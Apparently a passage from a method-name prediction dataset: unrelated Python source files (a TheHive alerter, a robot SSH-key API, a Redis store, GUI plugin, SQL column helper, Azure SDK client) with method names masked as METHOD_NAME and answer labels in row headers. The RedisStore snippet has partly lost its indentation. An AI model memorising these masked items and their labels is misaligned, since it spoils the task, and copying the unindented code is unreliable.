        if args in self.rule.get('hive_alert_config'):
            process_args = self.rule['hive_alert_config'].get(args)
            process_values=[]
            for arg in process_args:
                process_values.append(self.lookup_field(match, arg, missing))
            for i, text_value in enumerate(process_values):
                if text_value is None:
                    # Second chance: fall back to a top-level rule value.
                    process_value = self.rule.get(process_args[i])
                    if process_value:
                        process_values[i] = process_value
            process_values = [missing if val is None else val for val in process_values]
            raw = raw.format(*process_values)
            return raw
        else:
            return raw
    def alert(self, matches):
        # Build TheHive alert object, starting with some defaults, updating with any
        # user-specified config
        alert_config = {
            'artifacts': [],
            'customFields': {},
            'date': int(time.time()) * 1000,
            'description': self.create_alert_body(matches),
            'sourceRef': str(uuid.uuid4()),
            'tags': [],
            'title': self.create_title(matches),
        }
        alert_config.update(self.rule.get('hive_alert_config', {}))
        # Iterate through each match found, populating the alert tags and observables as required
        tags = set()
        artifacts = []
        for match in matches:
            artifacts = artifacts + self.load_observable_artifacts(match)
            tags.update(self.METHOD_NAME(alert_config['tags'], match))
        alert_config['artifacts'] = artifacts
        alert_config['tags'] = list(tags)
        # Populate the customFields
        if len(matches) > 0:
            #Populate dynamic fields
            # Only the first match drives custom fields and *_args formatting.
            alert_config['customFields'] = self.load_custom_fields(alert_config['customFields'], matches[0])
            alert_config['description']=self.load_args("description", alert_config['description'], matches[0])
            if 'description_args' in alert_config:
                del alert_config['description_args']
            alert_config["title"] = self.load_args("title", alert_config["title"], matches[0])
            if 'title_args' in alert_config:
                del alert_config['title_args']
            alert_config["type"] = self.load_args("type", alert_config["type"], matches[0])
            if 'type_args' in alert_config:
                del alert_config['type_args']
            alert_config["source"] = self.load_args("source", alert_config["source"], matches[0])
            if 'source_args' in alert_config:
                del alert_config['source_args']
        # POST the alert to TheHive
        connection_details = self.rule['hive_connection']
        api_key = connection_details.get('hive_apikey', '')
        hive_host = connection_details.get('hive_host', 'http://localhost')
        hive_port = connection_details.get('hive_port', 9000)
        proxies = connection_details.get('hive_proxies', {'http': '', 'https': ''})
        verify = connection_details.get('hive_verify', False)
        alert_body = json.dumps(alert_config, indent=4, sort_keys=True)
        req = f'{hive_host}:{hive_port}/api/alert'
        headers = {'Content-Type': 'application/json',
                   'Authorization': f'Bearer {api_key}'}
        try:
            response = requests.post(req,
                                     headers=headers,
                                     data=alert_body,
                                     proxies=proxies,
                                     verify=verify)
            response.raise_for_status()
        except RequestException as e:
            raise EAException(f"Error posting to TheHive: {e}")
        elastalert_logger.info("Alert sent to TheHive")
    def get_info(self):
        return {
            'type': 'hivealerter',
            'hive_host': self.rule.get('hive_connection', {}).get('hive_host', '')
        }
"""
ssh_key_management: Endpoints for managing SSH keys on the robot
"""
import contextlib
import functools
import hashlib
import ipaddress
import logging
import os
from typing import (
Any,
Generator,
IO,
List,
Tuple,
)
from aiohttp import web
from .handler_type import Handler
LOG = logging.getLogger(__name__)
def require_linklocal(handler: Handler) -> Handler:
    """Ensure the decorated is only called if the request is linklocal.
    The host ip address should be in the X-Host-IP header (provided by nginx)
    """
    @functools.wraps(handler)
    async def METHOD_NAME(request: web.Request) -> web.Response:
        ipaddr_str = request.headers.get("x-host-ip")
        # Shared 403 payload for both the missing-header and the
        # non-link-local cases.
        invalid_req_data = {
            "error": "bad-interface",
            "message": (
                f"The endpoint {request.rel_url}"
                f" can only be used from link-local connections."
                f" Make sure you're connected to this robot directly by cable"
                f" and using this robot's wired IP address"
                f" (not its wireless IP address)."
            ),
        }
        if not ipaddr_str:
            return web.json_response(  # type: ignore[no-untyped-call,no-any-return]
                data=invalid_req_data, status=403
            )
        try:
            addr = ipaddress.ip_address(ipaddr_str)
        except ValueError:
            # Malformed header indicates a proxy misconfiguration; surface it.
            LOG.exception(f"Couldn't parse host ip address {ipaddr_str}")
            raise
        if not addr.is_link_local:
            return web.json_response(  # type: ignore[no-untyped-call,no-any-return]
                data=invalid_req_data, status=403
            )
        return await handler(request)
    return METHOD_NAME
@contextlib.contextmanager
def authorized_keys(mode: str = "r") -> Generator[IO[Any], None, None]:
    """Open the authorized_keys file. Separate function for mocking.

    Creates the file (and its parent directory) on first use so callers can
    always open it in any mode.

    :param mode: As :py:meth:`open`
    """
    path = "/var/home/.ssh/authorized_keys"
    if not os.path.exists(path):
        # exist_ok guards against the directory already existing when only
        # the file itself is missing (os.makedirs would otherwise raise
        # FileExistsError).
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()
    with open(path, mode) as ak:
        yield ak
def get_keys() -> List[Tuple[str, str]]:
    """Return a list of tuples of [md5(pubkey), pubkey]"""
    with authorized_keys() as ak:
        lines = ak.read().split("\n")
    return [
        (hashlib.new("md5", line.encode()).hexdigest(), line)
        for line in lines
        if line.strip()
    ]
def remove_by_hash(hashval: str) -> None:
    """Remove the key whose md5 sum matches hashval, keeping all others.

    :raises: KeyError if the hashval wasn't found

    Fixes two defects in the previous version: the ``break`` after writing
    the first non-matching key silently discarded every remaining key, and
    the ``for``/``else`` raised KeyError only when *every* key matched the
    hash (after the file had already been truncated by opening it in "w").
    """
    key_details = get_keys()
    # Validate before truncating the file so a missing hash leaves it intact.
    if all(keyhash != hashval for keyhash, _ in key_details):
        raise KeyError(hashval)
    with authorized_keys("w") as ak:
        for keyhash, key in key_details:
            if keyhash != hashval:
                ak.write(f"{key}\n")
def key_present(hashval: str) -> bool:
    """Check if the key whose md5 is hashval is in authorized_keys

    :returns: ``True`` if the key is present, ``False`` otherwise
    """
    return any(keyhash == hashval for keyhash, _ in get_keys())
@require_linklocal
async def list_keys(request: web.Request) -> web.Response:
    """List keys in the authorized_keys file.
    GET /server/ssh_keys
    -> 200 OK {"public_keys": [{"key_md5": md5 hex digest, "key": key string}]}
    (or 403 if not from the link-local connection)
    """
    return web.json_response(  # type: ignore[no-untyped-call,no-any-return]
        {
            "public_keys": [
                {"key_md5": details[0], "key": details[1]} for details in get_keys()
            ]
        },
        status=200,
    )
@require_linklocal
async def add(request: web.Request) -> web.Response:
    """Add a public key to the authorized_keys file.
    POST /server/ssh_keys {"key": key string}
    -> 201 Created
    If the key string doesn't look like an openssh public key, rejects with 400
    """
    def key_error(error: str, message: str) -> web.Response:
        # Shared 400 response builder for every validation failure below.
        return web.json_response(  # type: ignore[no-untyped-call,no-any-return]
            data={"error": error, "message": message}, status=400
        )
    body = await request.json()
    if "key" not in body or not isinstance(body["key"], str):
        return key_error("no-key", 'No "key" element in body')
    pubkey = body["key"]
    # Do some fairly minor sanitization; dropbear will ignore invalid keys but
    # we still don’t want to have a bunch of invalid data in there
    pubkey_parts = pubkey.split()
    if len(pubkey_parts) == 0:
        return key_error("bad-key", "Key is empty")
    alg = pubkey_parts[0]
    # We don’t allow dss so this has to be rsa or ecdsa and shouldn’t start
    # with restrictions
    if alg != "ssh-rsa" and not alg.startswith("ecdsa"):
        LOG.warning(f"weird keyfile uploaded: starts with {alg}")
        return key_error("bad-key", f"Key starts with invalid algorithm {alg}")
    if "\n" in pubkey[:-1]:
        LOG.warning("Newlines in keyfile that shouldn't be there")
        return key_error("bad-key", "Key has a newline")
    # This is a more or less correct key we can write
    if "\n" == pubkey[-1]:
        pubkey = pubkey[:-1]
    hashval = hashlib.new("md5", pubkey.encode()).hexdigest()
    # Idempotent: re-adding an existing key returns 201 without duplicating it.
    if not key_present(hashval):
        with authorized_keys("a") as ak:
            ak.write(f"{pubkey}\n")
    return web.json_response(  # type: ignore[no-untyped-call,no-any-return]
        data={"message": f"Added key {hashval}", "key_md5": hashval}, status=201
    )
@require_linklocal
async def clear(request: web.Request) -> web.Response:
    """Clear all public keys from authorized_keys
    DELETE /server/ssh_keys
    -> 200 OK if successful
    (or 403 if not from the link-local connection)
    """
    # Truncate the file, leaving only a single blank line behind.
    with authorized_keys("w") as ak:
        ak.write("\n")
    return web.json_response(  # type: ignore[no-untyped-call,no-any-return]
        data={
            "message": "Keys cleared. Restart robot to take effect",
            "restart_url": "/server/restart",
        },
        status=200,
    )
@require_linklocal
async def remove(request: web.Request) -> web.Response:
    """Remove a public key from authorized_keys
    DELETE /server/ssh_keys/:key_md5_hexdigest
    -> 200 OK if the key was found
    -> 404 Not Found otherwise
    """
    requested_hash = request.match_info["key_md5"]
    # Rebuild the key list without the requested entry.
    new_keys: List[str] = []
    found = False
    for keyhash, key in get_keys():
        if keyhash == requested_hash:
            found = True
        else:
            new_keys.append(key)
    if not found:
        return web.json_response(  # type: ignore[no-untyped-call,no-any-return]
            data={
                "error": "invalid-key-hash",
                "message": f"No such key md5 {requested_hash}",
            },
            status=404,
        )
    with authorized_keys("w") as ak:
        ak.write("\n".join(new_keys) + "\n")
    return web.json_response(  # type: ignore[no-untyped-call,no-any-return]
        data={
            "message": f"Key {requested_hash} deleted. " "Restart robot to take effect",
            "restart_url": "/server/restart",
        },
        status=200,
    )
from __future__ import annotations
from datetime import timedelta
from typing import cast
from redis.asyncio import Redis
from redis.asyncio.connection import ConnectionPool
from litestar.exceptions import ImproperlyConfiguredException
from litestar.types import Empty, EmptyType
from .base import NamespacedStore
__all__ = ("RedisStore",)
class RedisStore(NamespacedStore):
"""Redis based, thread and process safe asynchronous key/value store."""
__slots__ = ("_redis",)
def __init__(self, redis: Redis, namespace: str | None | EmptyType = Empty) -> None:
"""Initialize :class:`RedisStore`
Args:
redis: An :class:`redis.asyncio.Redis` instance
namespace: A key prefix to simulate a namespace in redis. If not given,
defaults to ``LITESTAR``. Namespacing can be explicitly disabled by passing
``None``. This will make :meth:`.delete_all` unavailable.
"""
self._redis = redis
self.namespace: str | None = "LITESTAR" if namespace is Empty else namespace # type: ignore[assignment]
# script to get and renew a key in one atomic step
self._get_and_renew_script = self._redis.register_script(
b"""
local key = KEYS[1]
local renew = tonumber(ARGV[1])
local data = redis.call('GET', key)
local ttl = redis.call('TTL', key)
if ttl > 0 then
redis.call('EXPIRE', key, renew)
end
return data
"""
)
# script to delete all keys in the namespace
self._delete_all_script = self._redis.register_script(
b"""
local cursor = 0
repeat
local result = redis.call('SCAN', cursor, 'MATCH', ARGV[1])
for _,key in ipairs(result[2]) do
redis.call('UNLINK', key)
end
cursor = tonumber(result[1])
until cursor == 0
"""
)
@classmethod
def with_client(
cls,
url: str = "redis://localhost:6379",
*,
db: int | None = None,
port: int | None = None,
username: str | None = None,
password: str | None = None,
namespace: str | None | EmptyType = Empty,
) -> RedisStore:
"""Initialize a :class:`RedisStore` instance with a new class:`redis.asyncio.Redis` instance.
Args:
url: Redis URL to connect to
db: Redis database to use
port: Redis port to use
username: Redis username to use
password: Redis password to use
namespace: Virtual key namespace to use
"""
pool = ConnectionPool.from_url(
url=url,
db=db,
decode_responses=False,
port=port,
username=username,
password=password,
)
return cls(redis=Redis(connection_pool=pool), namespace=namespace)
def with_namespace(self, namespace: str) -> RedisStore:
"""Return a new :class:`RedisStore` with a nested virtual key namespace.
The current instances namespace will serve as a prefix for the namespace, so it
can be considered the parent namespace.
"""
return type(self)(redis=self._redis, namespace=f"{self.namespace}_{namespace}" if self.namespace else namespace)
def _make_key(self, key: str) -> str:
prefix = f"{self.namespace}:" if self.namespace else ""
return prefix + key
async def set(self, key: str, value: str | bytes, expires_in: int | timedelta | None = None) -> None:
"""Set a value.
Args:
key: Key to associate the value with
value: Value to store
expires_in: Time in seconds before the key is considered expired
Returns:
``None``
"""
if isinstance(value, str):
value = value.encode("utf-8")
await self._redis.set(self._make_key(key), value, ex=expires_in)
async def METHOD_NAME(self, key: str, renew_for: int | timedelta | None = None) -> bytes | None:
    """Get a value.

    Args:
        key: Key associated with the value
        renew_for: If given and the value had an initial expiry time set, renew the
            expiry time for ``renew_for`` seconds. If the value has not been set
            with an expiry time this is a no-op. Atomicity of this step is guaranteed
            by using a lua script to execute fetch and renewal. If ``renew_for`` is
            not given, the script will be bypassed so no overhead will occur

    Returns:
        The value associated with ``key`` if it exists and is not expired, else
        ``None``
    """
    key = self._make_key(key)
    if renew_for:
        if isinstance(renew_for, timedelta):
            # Bug fix: ``timedelta.seconds`` only holds the sub-day remainder
            # (e.g. timedelta(days=1).seconds == 0), which silently truncated
            # renewals longer than a day. total_seconds() covers the full span.
            renew_for = int(renew_for.total_seconds())
        data = await self._get_and_renew_script(keys=[key], args=[renew_for])
        return cast("bytes | None", data)
    return await self._redis.METHOD_NAME(key)
async def delete(self, key: str) -> None:
    """Delete a value.

    If no such key exists, this is a no-op.

    Args:
        key: Key of the value to delete
    """
    await self._redis.delete(self._make_key(key))
async def delete_all(self) -> None:
    """Delete all stored values in the virtual key namespace.

    Raises:
        ImproperlyConfiguredException: If no namespace was configured
    """
    if not self.namespace:
        raise ImproperlyConfiguredException("Cannot perform delete operation: No namespace configured")
    # NOTE(review): the MATCH pattern "<namespace>*:*" intentionally covers
    # nested child namespaces ("<namespace>_<child>:*"), but it would also
    # match an unrelated sibling namespace whose name merely starts with this
    # prefix (e.g. "foo2" when namespace is "foo") — confirm this is intended.
    await self._delete_all_script(keys=[], args=[f"{self.namespace}*:*"])
async def exists(self, key: str) -> bool:
    """Check if a given ``key`` exists."""
    # EXISTS returns the number of matching keys; a single key yields 0 or 1.
    count = await self._redis.exists(self._make_key(key))
    return count == 1
async def expires_in(self, key: str) -> int | None:
    """Get the time in seconds ``key`` expires in. If no such ``key`` exists or no
    expiry time was set, return ``None``.
    """
    ttl = await self._redis.ttl(self._make_key(key))
    # Redis TTL returns -2 when the key does not exist and -1 when it exists
    # without an expiry. The previous code only mapped -2 to None, leaking the
    # raw -1 sentinel to callers in contradiction with the documented contract;
    # treat both negative sentinels as "no expiry information".
    return None if ttl < 0 else ttl
298,493 | add to main menu | #* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
from PyQt5 import QtWidgets
import mooseutils
from .MooseWidget import MooseWidget
from .Preferences import Preferences
class Plugin(MooseWidget):
    """
    A base class for all plugin objects.

    A plugin object is a stand-alone widget contained by a peacock tab. In general, the plugins
    should be independent and be able to be removed or added to a given tab. Plugins are stored in
    Manager objects.

    see Manager.py
    """
    def __init__(self, layout='MainLayout', settings_key="", **kwargs):
        super(Plugin, self).__init__()

        # Name of layout that this plugin should be added (see PluginManager.py)
        self._main_layout_name = layout

        # The default size policy
        self.setSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)

        # Must be a QtWidget
        if not isinstance(self, QtWidgets.QWidget):
            mooseutils.mooseError("A Plugin must also be a QWidget.")
            return

        # The Peacock tab index
        self._index = None
        self._plugin_manager = None
        self._preferences = Preferences(settings_key)

    @staticmethod
    def commandLineArgs(parser):
        """
        Allows the plugin to add command line options to the parser.
        """

    def setup(self):
        """
        Adds automatic Preference callback connection to the setup method.

        For a preference stored under ``<group>/<name>``, a method named
        ``_prefCallback<Name>`` on this plugin (if present) is connected to
        that preference widget's ``valueSaved`` signal.
        """
        super(Plugin, self).setup()
        for key, widget in self._preferences._widgets.items():
            name = key.split('/')[-1]
            name = '_prefCallback{}{}'.format(name[0].upper(), name[1:])
            callback = getattr(self, name, None)
            if callback:
                widget.valueSaved.connect(callback)

    def connect(self, other):
        """
        Connect the slots of supplied plugin (other) to the signals emitted by this (self) plugin.

        A signal named ``foo`` on this plugin is connected to a slot named
        ``onFoo`` on the other plugin, when such a slot exists.

        Args:
            other[Plugin]: A plugin object to connect.
        """
        if self is not other:
            for name, signal in self.signals().items():
                slot_name = 'on' + name[0].upper() + name[1:]
                if hasattr(other, slot_name):
                    mooseutils.mooseDebug('{}.{} --> {}.{}'.format(self.__class__.__name__, name,
                                                                   other.__class__.__name__, slot_name))
                    signal.connect(getattr(other, slot_name))

    def setMainLayoutName(self, name):
        """
        Method for changing the name of the main layout that this plugin will be added.

        Args:
            name[str]: The name of the layout within the PluginManager.
        """
        self._main_layout_name = name

    def mainLayoutName(self):
        """
        Return the name of the layout within the PluginManager that this plugin is to be added.
        """
        return self._main_layout_name

    def repr(self):
        """
        Return data for reproducing the plugin as a script.
        """
        return dict()

    def canClose(self):
        """
        Called when the application wants to close.

        This is intended to allow the plugin to check if it has unsaved state and ask
        the user if they want to cancel the close or throw away the changes.

        Return:
            bool: Whether it is OK to close
        """
        return True

    def closing(self):
        """
        Called when the application is about to close.

        This is intended to allow the plugin to do any cleanup before closing
        """
        pass

    def onPreferencesSaved(self):
        """
        Called when the preferences have been saved.
        """

    def clearRecentlyUsed(self):
        """
        Clears any recently used items
        """

    def addToMenu(self, menu):
        """
        Allows the plugin to add items to the supplied menu (default: no-op).
        """
        pass

    def METHOD_NAME(self, menubar):
        """
        This allows the plugin to add menu items to the main menu.

        Args:
            menubar[QMenuBar]: Menubar to add items to
        """
        pass

    def onCurrentChanged(self, index):
        """
        Executes when the TabWidget (TabPluginManager) changes active tabs.

        Inputs:
            index[int]: The index of the active tab
        """
        pass

    def setTabIndex(self, index, signal=None):
        """
        Set the Peacock Tab index (see TabPluginManager)
        """
        if signal:
            signal.connect(self.onCurrentChanged)
        self._index = index

    def preferenceWidgets(self):
        """
        Return the preference widgets owned by this plugin's Preferences object.
        """
        return self._preferences.widgets()

    def setupMenu(self, menu):
        """
        Allows the plugin to populate a menu (default: no-op).
        """
        pass
298,494 | unquote | from __future__ import annotations
from copy import deepcopy
import sqlglot
import sqlglot.expressions as exp
from sqlglot.errors import ParseError
from .default_from_jsonschema import default_value_from_schema
def sqlglot_tree_signature(tree):
    """
    Return a short string representation of a sqlglot tree.

    The signature is the space-joined node-type key of every node visited by
    ``tree.walk()``, which allows you to easily check that a tree contains
    certain nodes. For instance, the string "robin['hi']" becomes:
    'bracket column literal identifier'
    """
    node_keys = [node[0].key for node in tree.walk()]
    return " ".join(node_keys)
def add_suffix(tree, suffix):
    """Return a copy of ``tree`` with ``suffix`` appended to its first identifier.

    The input tree is not mutated.
    """
    tree = tree.copy()
    # Look up the identifier once instead of re-running tree.find() for the
    # read and again for the write.
    identifier = tree.find(exp.Identifier)
    identifier.args["this"] = f"{identifier.this}{suffix}"
    return tree
def add_prefix(tree, prefix):
    """Return a copy of ``tree`` with ``prefix`` prepended to its first identifier.

    The input tree is not mutated.
    """
    tree = tree.copy()
    # Look up the identifier once instead of re-running tree.find() for the
    # read and again for the write.
    identifier = tree.find(exp.Identifier)
    identifier.args["this"] = f"{prefix}{identifier.this}"
    return tree
def add_table(tree, tablename):
    """Return a copy of ``tree`` whose first column is qualified with ``tablename``.

    The input tree is not mutated; the table identifier is always quoted.
    """
    tree = tree.copy()
    column = tree.find(exp.Column)
    column.args["table"] = exp.Identifier(this=tablename, quoted=True)
    return tree
def remove_quotes_from_identifiers(tree):
    """Return a copy of ``tree`` with quoting disabled on every identifier."""
    copied = tree.copy()
    for ident in copied.find_all(exp.Identifier):
        ident.args["quoted"] = False
    return copied
class InputColumn:
    """
    Represents a user-supplied input column name, held internally as a sqlglot
    expression tree so that prefixes, suffixes and table qualifiers can be
    added in a dialect-aware way.
    """
    def __init__(self, name, settings_obj=None, sql_dialect=None):
        # If settings_obj is None, then default values will be used
        # from the jsonschema
        self._settings_obj = settings_obj

        # Dialect resolution order: explicit argument, then the settings
        # object's dialect, else None (sqlglot's default dialect).
        if sql_dialect:
            self._sql_dialect = sql_dialect
        elif settings_obj:
            self._sql_dialect = self._settings_obj._sql_dialect
        else:
            self._sql_dialect = None

        self.input_name = self._quote_name(name)
        self.input_name_as_tree = self.parse_input_name_to_sqlglot_tree()

        # Quote all identifiers by default.
        for identifier in self.input_name_as_tree.find_all(exp.Identifier):
            identifier.args["quoted"] = True

    def quote(self):
        """Return a copy of this column with all identifiers quoted."""
        self_copy = deepcopy(self)
        for identifier in self_copy.input_name_as_tree.find_all(exp.Identifier):
            identifier.args["quoted"] = True
        return self_copy

    def METHOD_NAME(self):
        """Return a copy of this column with all identifiers unquoted."""
        self_copy = deepcopy(self)
        for identifier in self_copy.input_name_as_tree.find_all(exp.Identifier):
            identifier.args["quoted"] = False
        return self_copy

    def parse_input_name_to_sqlglot_tree(self):
        """Parse ``self.input_name`` into a sqlglot tree, falling back to a
        quoted identifier when the raw name is not a plain column expression."""
        # Cases that could occur for self.input_name:
        # SUR name -> parses to 'alias column identifier identifier'
        # first and surname -> parses to 'and column column identifier identifier'
        # a b c -> parse error
        # "SUR name" -> parses to 'column identifier'
        # geocode['lat'] -> parses to 'bracket column literal identifier'
        # geocode[1] -> parses to 'bracket column literal identifier'
        # Note we don't expect SUR name[1] since the user should have quoted this
        try:
            tree = sqlglot.parse_one(self.input_name, read=self._sql_dialect)
        except ParseError:
            # Unparseable names (e.g. 'a b c') are retried as a quoted identifier.
            tree = sqlglot.parse_one(f'"{self.input_name}"', read=self._sql_dialect)

        tree_signature = sqlglot_tree_signature(tree)
        valid_signatures = ["column identifier", "bracket column literal identifier"]
        if tree_signature in valid_signatures:
            return tree
        else:
            # e.g. SUR name parses to 'alias column identifier identifier'
            # but we want "SUR name"
            tree = sqlglot.parse_one(f'"{self.input_name}"', read=self._sql_dialect)
            return tree

    def from_settings_obj_else_default(self, key, schema_key=None):
        """Read ``key`` from the settings object, else the schema default."""
        # Covers the case where no settings obj is set on the comparison level
        if self._settings_obj:
            return getattr(self._settings_obj, key)
        else:
            if not schema_key:
                schema_key = key
            return default_value_from_schema(schema_key, "root")

    @property
    def gamma_prefix(self):
        return self.from_settings_obj_else_default(
            "_gamma_prefix", "comparison_vector_value_column_prefix"
        )

    @property
    def bf_prefix(self):
        return self.from_settings_obj_else_default(
            "_bf_prefix", "bayes_factor_column_prefix"
        )

    @property
    def tf_prefix(self):
        return self.from_settings_obj_else_default(
            "_tf_prefix", "term_frequency_adjustment_column_prefix"
        )

    def name(self):
        """The column name rendered as SQL in the configured dialect."""
        return self.input_name_as_tree.sql(dialect=self._sql_dialect)

    def name_l(self):
        """Column name with an ``_l`` suffix."""
        return add_suffix(self.input_name_as_tree, suffix="_l").sql(
            dialect=self._sql_dialect
        )

    def name_r(self):
        """Column name with an ``_r`` suffix."""
        return add_suffix(self.input_name_as_tree, suffix="_r").sql(
            dialect=self._sql_dialect
        )

    def names_l_r(self):
        return [self.name_l(), self.name_r()]

    def l_name_as_l(self):
        """SQL fragment selecting the column from table ``l`` aliased ``<name>_l``."""
        name_with_l_table = add_table(self.input_name_as_tree, "l").sql(
            dialect=self._sql_dialect
        )
        return f"{name_with_l_table} as {self.name_l()}"

    def r_name_as_r(self):
        """SQL fragment selecting the column from table ``r`` aliased ``<name>_r``."""
        name_with_r_table = add_table(self.input_name_as_tree, "r").sql(
            dialect=self._sql_dialect
        )
        return f"{name_with_r_table} as {self.name_r()}"

    def l_r_names_as_l_r(self):
        return [self.l_name_as_l(), self.r_name_as_r()]

    def bf_name(self):
        """Column name with the Bayes-factor prefix."""
        return add_prefix(self.input_name_as_tree, prefix=self.bf_prefix).sql(
            dialect=self._sql_dialect
        )

    def tf_name(self):
        """Column name with the term-frequency prefix."""
        return add_prefix(self.input_name_as_tree, prefix=self.tf_prefix).sql(
            dialect=self._sql_dialect
        )

    def tf_name_l(self):
        tree = add_prefix(self.input_name_as_tree, prefix=self.tf_prefix)
        return add_suffix(tree, suffix="_l").sql(dialect=self._sql_dialect)

    def tf_name_r(self):
        tree = add_prefix(self.input_name_as_tree, prefix=self.tf_prefix)
        return add_suffix(tree, suffix="_r").sql(dialect=self._sql_dialect)

    def tf_name_l_r(self):
        return [self.tf_name_l(), self.tf_name_r()]

    def l_tf_name_as_l(self):
        tree = add_prefix(self.input_name_as_tree, prefix=self.tf_prefix)
        tf_name_with_l_table = add_table(tree, tablename="l").sql(
            dialect=self._sql_dialect
        )
        return f"{tf_name_with_l_table} as {self.tf_name_l()}"

    def r_tf_name_as_r(self):
        tree = add_prefix(self.input_name_as_tree, prefix=self.tf_prefix)
        tf_name_with_r_table = add_table(tree, tablename="r").sql(
            dialect=self._sql_dialect
        )
        return f"{tf_name_with_r_table} as {self.tf_name_r()}"

    def l_r_tf_names_as_l_r(self):
        return [self.l_tf_name_as_l(), self.r_tf_name_as_r()]

    def _quote_name(self, name: str) -> str:
        # Quote column names that are also SQL keywords
        if name not in {"group", "index"}:
            return name
        start, end = _get_dialect_quotes(self._sql_dialect)
        return start + name + end
def _get_dialect_quotes(dialect):
    """
    Return the (start, end) identifier-quote characters for ``dialect``.

    Falls back to double quotes when ``dialect`` is ``None`` or is not a
    dialect name known to sqlglot.
    """
    start = end = '"'
    if dialect is None:
        return start, end
    try:
        sqlglot_dialect = sqlglot.Dialect[dialect.lower()]
    except KeyError:
        return start, end
    return _get_sqlglot_dialect_quotes(sqlglot_dialect)
def _get_sqlglot_dialect_quotes(dialect: sqlglot.Dialect):
    """Return (start, end) identifier-quote characters for a resolved sqlglot dialect."""
    # TODO: once we drop support for sqlglot < 6.0.0, we can simplify this
    try:
        # For sqlglot < 6.0.0
        quotes = dialect.identifiers
        # Prefer the double quote when the dialect supports several.
        quote = '"' if '"' in quotes else quotes[0]
        start = end = quote
    except AttributeError:
        # For sqlglot >= 6.0.0
        start = dialect.identifier_start
        end = dialect.identifier_end
    return start, end
298,495 | get | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RecoverableServersOperations:
    """RecoverableServersOperations async operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.rdbms.mariadb.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer) -> None:
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    async def METHOD_NAME(
        self,
        resource_group_name: str,
        server_name: str,
        **kwargs: Any
    ) -> "_models.RecoverableServerResource":
        """Gets a recoverable MariaDB Server.

        :param resource_group_name: The name of the resource group. The name is case insensitive.
        :type resource_group_name: str
        :param server_name: The name of the server.
        :type server_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: RecoverableServerResource, or the result of cls(response)
        :rtype: ~azure.mgmt.rdbms.mariadb.models.RecoverableServerResource
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.RecoverableServerResource"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2018-06-01"
        accept = "application/json"

        # Construct URL
        url = self.METHOD_NAME.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'serverName': self._serialize.url("server_name", server_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.METHOD_NAME(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # Only HTTP 200 is a documented success for this operation.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('RecoverableServerResource', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    METHOD_NAME.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DBForMariaDB/servers/{serverName}/recoverableServers'}  # type: ignore
298,496 | test linear model with single input | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras Premade Linear models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.feature_column import dense_features_v2
from tensorflow.python.feature_column import feature_column_v2 as fc
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.keras import backend
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import losses
from tensorflow.python.keras.engine import input_layer
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.engine import training
from tensorflow.python.keras.layers import core
